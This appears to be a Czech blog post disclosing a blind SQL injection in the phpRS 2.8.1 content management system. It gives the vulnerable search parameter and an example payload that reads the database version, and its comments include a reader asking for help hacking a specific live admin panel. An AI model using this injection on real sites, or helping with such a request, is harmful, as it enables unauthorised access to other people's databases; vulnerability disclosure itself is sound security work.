phpRS 2.8.1 Blind SQL Injection
Vložil/a RubberDuck, 28 Leden, 2010 - 18:24
CMS: phpRS 2.8.1
Bug: Blind SQL Injection
Version: public
URL: http://supersvet.cz/download.php
Author: RubberDuck
Found Date: 21-06-09
Publication Date: 28-01-10
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
/*-
/*- http://victim.at/phprs/search.php?rstext=all-phpRS-all&rstema=[SQLi]
/*- Example: 1 and 1=(ascii(substring((SELECT version() LIMIT 1,1),1,1))=5)
/*-
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
- Blog uživatele RubberDuck
- Pro psaní komentářů se přihlašte
Hack VPS
čaute potreboval by som hacknut toto http://93.185.107.176/apanel/ poviete mi ako nato Dakujem
NORS
Pokud máte někdo chuť, můžete zkusit hacknout další český redakční systém - NORS (http://norsphp.com). V případě úspěchu mi ale prosím před zveřejněním včas napište o jakou zranistelnost se jedná na mail - [email protected].
vyzva :)
aa to je vyzva :) neco s tim urcite udelame
Tak pokusit se můžeme :) Ale
Tak pokusit se můžeme :) Ale ještě pár dní nebude čas. Holt nejen zábavou živ je člověk :)
nice one :)
Pekne ...
KOukam, ze jde o posledni verzi tohoto cms ;)
Ano. Ale od doby vydání této
Ano. Ale od doby vydání této poslední verze (verze 3 je asi stále ve vývoji) vyšlo několik patchů, takže je možné, že je tato chyba již zaplátovaná.
Viz: http://www.phprs.cz/magazin/download.php?sekce=6
Kažopádně mám v plánu se podívat znovu do kódu a prohlédnout si i pluginy ;)
fajn práca s phpRS :)
Ak máš čas a chuť, kľudne prever aj toto:
phprs.cz/magazin/download.php?akce=detail&id_detail=49&sekce=7
V prípade záujmu poskytnem živý web s touto verziou na "testovanie" ;-)
Až budu mít trochu více času,
Až budu mít trochu více času, rád se podívám :)